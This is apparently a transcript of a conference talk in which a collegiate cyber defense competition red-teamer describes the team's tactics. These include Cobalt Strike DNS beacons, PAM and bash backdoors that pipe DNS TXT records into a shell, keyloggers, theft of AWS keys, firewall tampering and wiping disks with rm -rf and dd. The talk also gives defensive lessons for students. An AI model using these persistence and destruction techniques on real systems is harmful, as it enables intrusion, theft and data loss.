 Hello. This is Forrest. I am here to speak to you today about some certain shenanigans that I pull off once a year with hacking college kids and telling you exactly how they do it wrong. Let's go ahead and get right into the slides. So, if you want more information about me, you're welcome to look at jrwr.io. I'll be happy to provide guidance. You have a contact page and sorts. You can get ahold of me on Twitter of sorts. So, what I do, well, I should say, who am I? Some of you have probably seen me floating around Defconn before. I am Hachan, pretty much. Everybody knows me of this crazy hat of mine. It's a Pith helmet with Wi-Fi access point on it. Everybody generally loves it. But I've done a couple of other weird things over the years. Right now, I'm a Department of Defense subcontractor, cyber security auditor. Pretty much, I do audits for small military manufacturers. They make parts, whatever. And they do it terribly usually. It's rather boring, though. It's working to stay 101-21. If you want to look up that in Tom Fullery. At one point, I was a Dogecoin mining pull operator in Sassaman for a fundraiser for the Doge car. That was also awesome. And that's also where the Pith helmet comes from, was way back then. As you can see, the Doge car was amazing. You should Google it. There's some videos out there of me being chased with a beer cooler because I had to steal it for some ice shenanigans. But for this talk, the really relevant is that I've been a red team member for any CCDC for about three years now. It's Northeast Colgate Cyber Defense Competition. The basics of the competition is that there is a blue team, which is college students, being trusted into a network of sorts, a standardized business network that they would come across, and they have to do all the things. So it's several teams of students from local regions for the Northeast corridor and there's others for each region. And so they're kind of like an emergency blue team, right? So they come in and they have to fix the network, whatever's wrong with it, to get it stable. They have a list of services that they have to keep online. We've already been given about an hour already to attack them as red team before they could even get hands on keyboard the night before. So we've got all of our implants in place to make sure they're nice and imponed. Generally it's a two day event. The red team is a group of chosen pen testers and infosec nerds. Generally, it's from mostly people who've been working with a professor that's running at Darryl Johnson, at least for the Northeast corridor. Darryl's great. He goes to RIT, Rochester Institute of Technology, and they run the red team. So there are other teams of black and white support as well. White teams is people in the rooms that help the teams out, just basic support roles, filing tickets if something explodes. Things of that sort, things get fired. The black team is the one who actually manages the infrastructure, making sure that everything's up and running and such. They generally have physical hardware that they're dealing with. We wanted it not, of course, because it was virtual, but the last two years, which is what we were covering 2019 to 2018, it was in person and we could really fuck with the hardware with implants. So on top of defending themselves from red team, they also have to do other things that are worth points and some of it's worth a lot of points, right? So there's incident response, right? So they have to write up a report stating that, you know, this is how we were compromised or this is what happened. You know, this is the current state of the system. This is what we did to fix it. And such, these are called injects. Maybe it's a request from the CEO to do something like change his password or allow him VPN access. The black team is always throwing them new stuff to do. And those are worth a good amount of points. Those are considered daily operation stuff, right? Stuff you'd have to do on a day-to-day basis as somebody who is booting or just general IT in the network. So then, from there, scoring is really based off of how long red team had access, the reports made, and the services kept alive and the scoring of the services is automated. And that's what's with that as well, you know, our spoofing and such. So the first hour that we get access to the network. We infect everything. We have all of their passwords in a table already. So we have scripts in place. First thing we do is hit enter and fax everything that we can get hold of. And we do all the crazy. Cobalt strike, which a lot of you might know from your toolkits was actually written for any CCDC by Raphael Mudge. Great guy, by the way, if you ever meet him at DevCon, he does float around there. Dude is crazy good at it. He does these DNS slow burn beacons. So he'll like stack beacons on top of one another. So he'll do these really fast HTTP beacons, but then we'll have these beacons to like a special domain that he's only registered for this where it only pulls once every six hours. Right. So if they haven't removed it from the system, they're not going to notice the traffic. And then he uses that to pivot more beacons into the system for the faster ones. And that's the ones we work off of generally he provides the team server and we've, you know, fucks with the system from there. He does, you know, DNS fronting IMCP pings beacons IPv6 base beacons we've done once before that was fun because the Palo Alto's don't filter that very well. But if you use Cobalt strike now you know why some of the features are like the way they are. The quality, you know, at least from what I understand from much. It was written for any CCDC and it was solving a problem armatures would just wasn't solving right so he was improving armature and he just got better with it and he started selling it as a product because it was it was a good idea. Disable the antivirus infect the networking hardware you know the Palo Alto their switches their firewalls, we have access to it all so we just go to town. You know we have full access to practically everything we have the domain admin password so we just start deploying everything that we have our arsenal. So if you think of every single piece of kit that you can deploy against what you have as domain admin for persistence we generally do it right we have a team of about 15. We're having to manage. I think it was 10 teams last year. So we do have to kind of it really is a high workload that's why there's, there's a lot of grouping and stuff like that and Cobalt is because we have to do it on a per team basis we have to score per team. We're doing Linux backdoors because I'm a Linux nerd, I do all kinds of fuzzy things. For instance, you know, Pam backdoors and things that sort and we'll cover that here in a moment. But we try to keep low. And we watch as teams try to find us right like a lot of times their services just go down because they're they're just breaking it for themselves right like we're just persisting. So what we'll do is steal some passwords the Cobalt strike key logger is amazing for this. We will steal some SSH keys AWS keys if they're doing cloud that year. They love just leaving them on your Linux boxes. Right. We're also going to put it. We'll reinfect using where we can some of the common backdoors that we use we have an IS backdoor that was written. I don't think it's publicly released, but it is signed using unleaked certificates whenever he actually had a code signing cert but they wouldn't renew it on them this year. And Pam has to say it's backdoors we would use nothing forever. Still get students we can just log in with whatever password you want as route bash backdoors. These are my specialty. I've actually recompiled bash for systems and place backdoors or do some home it just run an extra curl command and pipe that into whatever. We're doing DNS backdoors that way with there's a environmental variable that you can set right off hand but there's an environmental variable that you can set where it's a callback it's supposed to be the missing command callback or just a command callback and it will run it after every successful command. You just run that every time right you set it in the ETC profile nobody ever looks at their at their environmental variables for compromises right. Not for two years at least. We were piping dig directly into bash for that. We're doing TXT records and just shoving shell and Aaron, waiting for him to show up on their firewall wasn't like we're encrypting it or anything. We still have monitoring place like Splunk, and we'll just backdoor it. We got a guy who's we call our Splunk nerd, and he has a custom application that he'll attach to their Splunk instance. And what he'll do is that it'll become his managed instance so they're all kind of upstream to a centralized orchestra system. He just manages everybody Splunk forum so he can do deployment payloads that way. Most team members don't notice that this is happening. It's very, very stealthy, and it's great for my understanding the code for it to relatively easy to implement you can just take one of the sample applications and just have it be managed by something else. It loads through it. Most of the time they don't notice it's happening and you'll see that in some of the screenshots as well that it's coming down through Splunk. We'll backdoor the Palo Alto, put our own accounts in there's certain hacks that particularly happen with some of the web interface they'll add little JavaScript snippets that report home. They'll get blocked because they're just blocking all HTTP traffic at this point but we'll actually inject custom theming where it it'll send there when they change the password to the web interface it sends it back to us. I have a thing where I'll do, I'll backdoor all the elves on a file system like I'll take busy box. Take all you know full compile it put the backdoor in there just runs the command through DNS again. You can compile it. Some link it all out into into the Debian system real fast or anytime they run an application at all, it gets compromised and it links back to the busy box parameter. And I thought with their path a little bit and I am pointed, I rearrange it so that it's in like user local bin is first. So you set that first you throw a busy box in there. They'll never find it. Nobody whoever looks and use their local bin, come on. Right. So, we'll also do some some time fullery. If we notice that they're trying to install detection tools right on Windows or Linux, especially on Linux will try to compile stuff will backdoor it we have the C backdoors that we just throw in any application. And we'll just, you can find them on GitHub, they're everywhere, you throw them in there and they compile it and they run it. It's backdoor now the group get hunter backboard. We only have two days we're just throwing anything that we can it'll stick right. So, if we see somebody being clever will this blue screen the box right like we're not going to deal with any of their shit. You know, they're trying to be clever there's they're going through process monitor prokman and going. No, and then crash the box. Right we'd rather just crash the box before they get ahold of our loot. You know, very rapidly, you know, this over the happen over a course of, you know, a couple of hours will spot the screenshots coming in the cobalt strike we're like, well, he's up to no good. And just crash the box. We'll reboot it that'll be fine but maybe put some dancing bananas on a screen. We'll get later to that. Sometimes you like to do anoints a lot of annoyance really kind of annoy some of the teams like there's some teams that really like to use Tmux. And when we replace it with screen. You can't run Tmux. Oh, but if you try to run screen that just dev you random to your terminal. But if you try to run a Maddox, it'll actually open them and if you try to open them and opens up nano, which is super fun. They really hate that when you do that to somebody who's trying to remediate a box is commands keep changing out underneath them. And they're trying to figure out how are you in the box, you're not even showing up. Well, we have a TTY and they have three Metasploiter something like that and we're just pop, you know, which is screwing with you. Automation is key though, right if you're popping this many boxes we're having to handle over 100 boxes. Automation is key until you start noticing somebody trying to be clever and you go and fucks with them for a couple of minutes. We'll reconfigure their DNS to make them distracted and we'll just drop their DNS into a black hole. Our beacon still work but their DNS doesn't. Right. We'll be pointing to our DNS servers which drop everything but our beacons. We've screwed up a couple of teams doing that. That was super fun. Reconfigure the Palo Alto right underneath them. Right. They keep adding a block rule will drop that block rule or we'll reconfigure it that block rule where it doesn't work. The orders out of place and the allow rules just stuck up there and all the block rules don't work, you know, order of operations. We reconfigure services to bring them down. Right. That's part of the scoring, you know, we don't have a particular score ourselves but we want to make them score as least as they can for all the teams. So we'll add, we'll deface web pages, we'll deface the backgrounds, we'll deface services, anything that we can get a hold of. All services are scored with ping SSH and then maybe the contents of the web page itself. Right. So if it doesn't match a checksum, then it's considered down and we'll deface them bring them down. My personal favorite was was uninstalling engine X and replacing it with Apache, kind of configuring it right and then just leaving it half broken and letting them to fix it. So, I mean, you know, trying to get as much time as you can to leave them leave your main beacons alone have them misdirected right you want them to kind of focus on on the crazy that is happening. So, this is going fast than I expected but hey, that's working. So day two is when the fun really starts right because we don't really want to blow up their boxes on the first day. But we do want to do it on day two. So we install the new back doors anything that we cooked up overnight because we don't sleep. That's what caffeine for. And then we just activate all my prank scripts. I started doing that when I first joined. I just, I had some on hand. And we'll see some of these by the way I got a little treat for you rotate the screen by 90 degrees every 30 seconds makes it really hard to admin a box. Dancing bananas all over the screen it's actually a fork bomb I written you can see an example of that in the bottom right hand corner them trying to kill it and it's not working. 500% sized mouse. Super funny when it happens they can't really use the mouse because it's slightly broken but it's good fun. Bad keyboard inputs, you know, now they're door back. Good luck. You can't change it now by the way we've we've disallowed administrators from changing that registry key, you're going to have to change the ACL on that sorry, you're going to have to go find it. ACLs are very powerful in Windows for registry keys you can set some insanity in there and make it where they can't remove your shit, unless they they actually go in and rip those ACLs out right. So if you had like, I had one where as part of the banana script actually is it. There's a list of process image names, it's the debugger key, go look up the image name debugger key and you can do some really backdoor shit. And it just won't run programs will say program that found or my particular instance every time you run the program it would just spawn a new banana. Task Manager Procman, a lot of the AV software that they were trying to run would kind of be dynamic with it you know so you know we kind of work with it. Generally, it was kind of a dynamic environment on day two trying to really screw with them because they had a lot to think about right like they're really trying to keep the services up from us because you know, they have 15 people going on and they're just, you know, they're a team of eight. Um, later on in the day will really start screwing with services, memes, you know defacing backgrounds things like that really let them know that we're home. Deleting files programs changing passwords right will delete files underneath will when they're writing a report. We'll, we'll just delete it right there in front of them. You're so mean. But that's what makes it so much fun. You got to try something. So it will delete stuff they're writing the drawing something in MS paint will will draw something for them and they freak out because we're controlling the computer. We'll start Googling things for them on their own computer that's super fun, you know, brick rolling them things like that you know just opening up URLs sending them helpful messages, offering help. Ransomming the domain controller for donuts. It was the funnest thing we've done. We did that a couple of times where we would ransom a service and we'd want donuts and they would have to go and hunt down donuts. Or other various things for us. We had a dance off to get your domain controller back after we'd pwned like six of them. They are force one. So, as you can see, this is the most fun you'll ever have as red team ever two days of packed full of craziness, but it gets better. So after we've done all the shenanigans. There's a slight story here. So if you look in the very very bottom there. There is a search for it. We had one year, the local, the local police department decided that they're going to help out and we asked them hey you want to do a no knock raid on some of the students rooms. So we coordinated that with them and they did it for all the teams they rated and took their domain controller just stole it. So we went in there, looking all official scared the crap out of most of them. It was great though, as it was hilarious the whole time. There is some video of this I will show you later. But shenanigans, lots and lots of shenanigans, the most shenanigans you'll ever have being a red teamer. The burn right this is the last hour right this is what we're we're nuking the discs we're, you know, you can see here we're doing rmrf. No preserver screw the desk you know ddi ddu random the desk blue screen the boxes, delete the AWS account. It doesn't like when you do that by the way. We can cat the boot loaders anything that we could do to destroy their systems where they're no longer anything that we have access to left is destroyed. Nuclear right. So, after all of this is, you know, done. We tell them what we did, right, we actually sit down with them with every team and say well okay so your team seven well. We kept giving us your passwords to the key bloggers. You never found the Pam back door. Right, it's it's here it's here every year we told you this last year. You know, you didn't, you didn't block us right were you checking for DNS traffic or you're too busy doing insects, or did your firewall God not to look because there's a new guy to do not check for DNS traffic did not try mcp traffic things of that sort so we'd actually sit down with them and tell them what they did wrong. A lot of it was they just weren't looking. You know, anybody with wire shark and a mirror pork and really see us like when 90% of the traffic coming out of your box is DNS and it's like gigs of it. You have a problem. And a lot of times they just don't block it. I always said. I had a good firewall guy somebody who had wire shark open your poor just streaming logs right, maybe booted off of live CD or something that they'd be able to find us right we're very noisy right maybe this is long term begins. I did not but you just do standard incident response and you know, most of our stuff is detected right cobalt strikes super detectable. You know, open a proc mod and you see the crap that's going on and I'll ask right kick us out of the fact that she can. Right, even if you bring services down an incident response and mind you this is a compressed timeframe and this kind of goes for most incident response right. Don't be afraid to turn off the network. I mean, even if it's just a, you know, 10 minutes right to get your bearings and start looking at traffic you know hands off keyboard plug the ethernet back and see what's happening right see what's what's what's talking. Just those traces down kick us out because if you kick us out we can't get back in if we don't have your passwords we don't have any beacons we're not getting back in right like we have some of the back doors and sometimes they stay but a lot of the older ones you know they're all picked up by a V nowadays so A lot of it is they just haven't had a lot of experience with dealing with these computers and dealing with systems like this right like they they're in a system administration role trying to do security here and they're all they've been taught a security. So, and they gotta treat the happening systems hostile. They're not doing that most of the time, right, they trust in the permission they trust in the files they're leaving on the system. They're trusting their backups. We've infected the backups we've done that they're going to restore from a backup, and we'll re infect them again because it's an old password and we always try the old passwords right like this is how it works. So, most of you just trying to get the air out about what we're doing, right, it's really easy to spot us once you know what we're doing because we're up to all kinds of shenanigans. And so, it's not, it's not, we're not doing anything revolutionary here most of this stuff is just a grab bag of anything that we can find off a GitHub for the most part I mean, it really strikes really nice and we do write some shenanigans for some of the scripts but really though, we're not doing anything particularly special but a year after year, and we have students we have teams, we have teams that are amazing at this right. Don't kick us out in 15 minutes and maybe we'll get back in second day, right. Maybe they'll fall for a phishing email. We've had that happen once or we'll steal something from the room. I suppose there's physical security kind kind of involves we keep it, you know, we don't do it that much but we'll still laptop or you know or you know give it back to them with put this XP on it and expect them to use it because there was a service on it. So, I have I have videos I'm going to show you I'm going to talk over them I'm not going to play the terrible music sits on them. Both of these are on YouTube. You can look up any CCDC. And you can find all over all of our previous years videos right they're not very long, and they really showcase some of the payloads that we're getting back right in a lot of the way that I can show. So, my number one here. So this is from 2019. I'm going to just a smidgen ahead here so we have back door the Wi Fi router. It was. We just get a custom update server. Here they're googling how to do security. You know, Wi Fi passwords. So we got a little bit of a backdoor stream from white team and they'll post in the Slack some of the things that they find from us but I read team. You know, passwords to the key loggers. And you can see, you know, we we really it's just password discipline is so terrible with these people sometimes. You know, they're trying to track us down and Procman and management corp. Beaver. I don't think it's supposed to be that. They're futzing with their DNS. You know, changing their administrative passwords because they don't know it might as well we run it. King size mouse was ran on a couple of machines you can see it here in action and cobalt strike makes the machine very hard to use but you can get rid of it. So let's figure out why their DNS has been changed to another server because it's ours now. Yeah, we were dropping some Rick roles on them several times. A lot of kids they just don't they just don't know the memes. Yeah, we did that a couple of times will change out the Wi Fi password or the Wi Fi AP to what their what their password was just just to show we care. So we were we had a backdoor they had to keep Wi Fi up. And so we have a little Wi Fi router up that we are actually using as a backdoor, or getting all the teams with it. You know, making some puns and jokes and things of that sort we did a lot. Sometimes the likes of only paste the password in a slack don't do that. That's being managed by red team that's a pretty common problem. This is all set to terrible music that I'd rather not play them trying to install security essentials. Are they not teaching them what accounts as antivirus on Windows nowadays. You just not work on Windows server. Sorry. You really should turn that on and setting your passwords not going to do any good if we have a key logger on the box, right. We'll send them helpful messages, you know to annoy them that we see them that they're editing their firewall it's not doing any good. More passwords of course. Really the key logger is a key lockers are so old school right like oh who installs a key logger, but they just give every time really looking to install the key lockers if you're popping a box. More dancing bananas shenanigans as usual. I always like to drop them on boxes that we kind of have access to that haven't done anything on in a while. We want to show us a proof that we're we're in their box right we want to give them that little tickler that we're still fussing with their systems. They try killing it but each banana is a separate process so if they don't know how to mass kill stuff then our bites and get to help you. You can see here they're they're actively being ran. Mind you, these are these recap videos are made like an hour before the competition ends so they're made in a rush. More helpful messages of banana man, they weren't killing them fast enough I just kept spawning more of them just to annoy them. The banana itself it's not backdoored it does change some. Yes, yeah, can he so this is this is it rotating by 90 degrees every 30 seconds and we actually got video from one of the white team. These ultra wide monitors making it super stupid. This is you know, it works fine now but given 30 seconds and it won't. They're trying to figure out how to kill it and I'm playing yackety sacks over their over their audio at the same time they still haven't closed it. We do this to all the teams is the one we got video of. And so this cracks me up every time I watch it. You know we give them some encouragement to get demoralized very quickly. But we'll actually back off of people that we have access to towards the end there. Mostly because, you know, kicking the puppy while it's down. We don't like to do that too terribly much but you know more bananas on it on write ups is super great oh yeah nothing's infected bananas everywhere. They write on the board sometimes will see a password is off the whiteboards will take photos from cracks in the walls and stuff. More bananas. This spot I have one that'll just fork bomb a machine to the point where it just won't run anymore. A team challenged us saying hey, we don't have any bananas on ours. Yeah, give it 10 minutes. We really shouldn't be killing SVC hosts. We had sign in sheets and we did actually sign in as red team and nobody checked. They're trying to run clam AV on the box and that's not going to do it again the definitions are too old. These are examples of some of the injects. Some of it is quite going fast but more more words of encouragement. At this particular point right they got so much stuff running that it's it's starting to bog down their boxes but you know they'll give us keys and really we're just googling stuff better than them. We're letting you know them know that their boxes still pops. There's really the WAP that's what they have in the rooms one of the teams did that. Yeah so we stole the laptops and we gave them Windows XP. It was great. We put all of our malware on it too and we stole it without them knowing it was great. All the teams did not notice that we had stolen their laptop and we just gave it back to them. Some encouragement from remote tech support. So this one. So they're doing some role playing here so this guy is yelling at them. If you watch this video on YouTube it's a little bit better but this guy is yelling and I'm like well why did he steal the laptop? Do you like record it down? Like who was this person? And like well I mean you know the student doesn't know what the hell is going on at this point right? Like he doesn't know how to respond. So the students are giving real words and areas like well what the fuck? Why did the laptop walk off? Right so he's trying to explain himself and it's not very good. He's trying to figure out well just steal it from underneath your keyboard? Like how did this work? Right did you give him the laptop? And why is he playing Tetris? Tetris didn't hit bootloader. So that happens so many times right? We hardly get to see that as red team but here's us imaging them all. Somebody actually had an image for this laptop for Windows XP and they just downloaded it from work. And we were getting beacons off of them. So this is some of the searches and typings that's coming in while we still have beacons for days. Bad passwords. At this point they've changed their passwords six, seven, eight times and they're just done. We made good friends with him. He's going to pawn his own box but unfortunately the beacon had disconnected. But he was one of the team members. He'd wanted the dance off to get his domain controller back. So here you can pawn your domain controller again. They had signed in sheets. We were signing in with anything and everything under the sun and nobody was checking in when they should have been. We had to escort against that too. We're starting to delete things now and it's just out of control at this point, right? So, you know, a CEO is asking why are you playing Tetris? We still run gateways. I thought we all had Dells. Because their gateway was down. They didn't have internet because we'd nuked the Palo Alto. And that's just because wall messages back and forth, you know, chatting with the teammates going, you know, can we pop a box? There's always women in our technical capable of breathing fire. Definitely so. So this one's where, you know, the network is down and he's losing money. And he's yelling at the teammates going, well, what's going on? Like, I'm not going to sell the other house in the Hamptons. I'm going to fire you first. Classic CEO speaking. He's walked out. We saw Mr. Dino a lot of times. You'll still have beacons. Oh, this is the group shot. This is all the red team for 2019. You can see me there in the corner. Mudge is in the center. You know, I don't remember half these people's names at this particular point. We don't meet that often, but I have a mug with all their names on it though. Daryl's on the left there. But this is where they have to defend themselves against, right? They're Silas. He used to work at VirusTotal. He used to, he would weaponize Malware that he would, that he would get in from Google and VirusTotal and sick on students. The madman. He would neuter it, right? There was an incident, but he would neuter it and repurpose it for students. So he would actually infect them with Malware. Just the beacons were going back to him instead. Crazy, crazy fellow. Most of these guys are networking engineers. Most of them aren't even ready. You know, they aren't like, this is what they do as a red team. They're more dangerous because they're in the field every day, right? They're networking engineers, Splunk engineers, but they know the full depth of those applications. They know what they can do. And then you take that and twist it. That's what I think is fundamental to being a red team, right? You know how that stuff's supposed to work and then you twist it to your needs, your evil, evil needs to do what you needed to do, right? You have much more scope availability. You have ability to hide better if you know more about what you're dealing with, especially with applications. Well, I'll just talk about near off. We'll go ahead and go on to the second video here. Let's skip ahead a little. This is from 2018. More shenanigans, you know, giving us their keys for AWS. Yes, we would persist with a team, with a team name called white team on the box. They had to go in through the serial console that year. They really didn't understand what was going on. They didn't know it was serial. I think they were trying to screw with each other. Allowing us to say traffic is always a bad idea. By the way, you're generally very flat networks. Us, Wall and them are spunk admin going, hey, do you need to get your spunk working? Yes, we've done that. We've installed Linux on a box. You know, always check your agent names. We're always changing your passwords for you because you should be changing them often. And if you're not, we're going to. We'll wipe your backups always, right? That's just what we do. PowerShell is in great guests of what we do as well. No, you can't get rid of DNS. That's just terrible. More keys. That's our key added in. Us taking surveillance photos of passwords on the whiteboard. You know, that's not a good place to put them. Dockers should not be running on your laptop. This is kind of what our desktop would look like, right? Because we have all the teams open. Somebody thoughts in with the Palo Alto, at least trying to. Mudge sending beacons down. This is just, you know, SSH keys being sent in. Me playing annoying noises because they had all on once and I couldn't turn off the speakers. Oh, that was great. We'll meme them up, change their logins to whatever we want. We'll change their MOTT and they forget it's there and it's backdooring every time that MOTT runs. We will sometimes, if you ask us to stop, sometimes we will. If you're nice to us, just let our beacons live and we'll stop messing with your box. That actually is probably pretty, pretty good advice to somebody's actively in your network and you're trying to fight them, but really you should just be unplugging the internet. I played Tetris with, I attempted, and this is a really bad demo, but I attempted to play Tetris with somebody over their own T-Max session while in front of them. So I'm actually attached to the T-Max session and I'm trying to get BSD games to work. But, you know, if you've lived in Debian land, that's actually kind of hard. But I'm playing some worm with them, at least trying to. Well, attempting to. There's actually kind of a fub. Oh, well, there's their keys. Well, while I'm for various effects, you know, their AWS access keys, because they're leaving them in configs everywhere. Yes, it is our router. Some people don't know what cloud trail is. It's great. Yes, the box is fucked is a technical term. That's always, always TSS problem. Yes, we stole your passwords. Take the Google's weird shit all the time. One team decided to go this kind of advanced format for their passwords. They didn't know what echo is. We find that a lot. A lot of kids don't know what what is going on with some of the messages to their Splunk. We'll actually interject bad Google's results. We've actually had it where Google would redirect a Bing and it would be the third page of Bing. And that's all they could access. This is Beacons coming in from Splunk as he started to manage their system for them. Somebody trying to do some art because they're bored and they don't have anything to do. We decided I did at least that I was going to make a little bit of fun. I printed out this stupid piece of paper that said, hey, you're trying to get an SSH. Would you like to try to tell that instead slipped it under everybody's door? We actually got them back a couple of them. There's the search warrant. That was fun. There's Clippy. We got him back from a couple of teams. This is us ransom wearing their team. Yes, that happens a lot now. So this, this is great. We made them take this photo for us and we made them apologize for trying to steal our firewall, which was their firewall. But it was really our firewall now. We gave them back their firewall eventually, but no, no guarantees there. Let me just start deleting stuff, you know, from them. It's the same stick every year practically. I know running Docker and we'll have beacons inside of Docker and they'll never see him in there. We're starting to get beacons climbing out now. Me DD me DDing you random the TTY for shits, and that's always super fun when it goes BP hell. Yep, we're starting to delete this 32 now. Teams start usually playing music at this point because there's not a whole lot they can do because we're just starting to pop boxes now. Disable their internet, you know, anything that we can do to destroy the box. At this particular point, so you get the general idea. We start deleting other AWS instances which are scored, which has a bunch of stuff in it, making sure to delete all the snapshots, all the beacons are dead. This is the write up where they had to do the search and seizure. Actually, kind of go back to that a little bit. This is the leading sis 32 and the such. So, as you can see, we're up to all kinds of shenanigans. Obviously, we've had some disruptions this morning numerous rays under my standing is law enforcement officer in the room and collected some device or devices. This is obviously concerning to the executive staff as we need to talk and make sure we understand all the facts and now. This is the search and seizure that was pretty good. We don't have any video of it though it wasn't recorded because they just kind of surprised us on it. They even rated red team room at one point. So you can see we generally have. We generally have our standard means it just is just the Northeast corridor right like there's there's teams for every corridor. And yeah, so there's teams for every corridor. And then they go to a nationals and they fight there and they have some real red teamers there right like they'll actually bring out some stops they have some amazing tools up there. So they don't release and it's for good reason because they're very dangerous actually. And they're meant for only use some competitions but you can find it right like now that you know this terminology is CCDC start trying to find some of the other. Some of the red teamer tools out there for there's some amazing stuff out there, and we generally do tag it for CCDC. If you take a look here I got some URLs for you if you want to check some stuff out for the northeastern corridor, you could do any CCDC any CCDL.org. We want to check out the national competitions. Yeah, maybe even become a red teamer there. Check out national CCDC.org, but overall check your local colleges you never know they may want to participate in this and they haven't had anybody to actually start a program there right volunteer program get with a professor something along those lines. See if they already participate. You can help them with training become a red teamer for them set up a scenario for them let them attack you attack them that type of thing. It's good fun and allows you to kind of structure muscles as a red teamer without having to really worry about scope right like if you blow up a box who cares. Right, but it's like normal red team, you know if you're trying to do pen testing you really can't just like destroy a box. Right you can't really simulate being a hacker, because really not going to, you know, delete the domain controller, but in this competition he would. It's the best two days you could have right just just alright. It's the best two days you can possibly have it allows you to test new tools and tactics in a controlled wild environment you can just let it loose and go to town. As long as it doesn't leave the network they don't really care what it does. As long as it doesn't like make the box catch fire like literally catch fire I think we had that one year. But, well, I've had my 50 minutes Omar you want to come on back.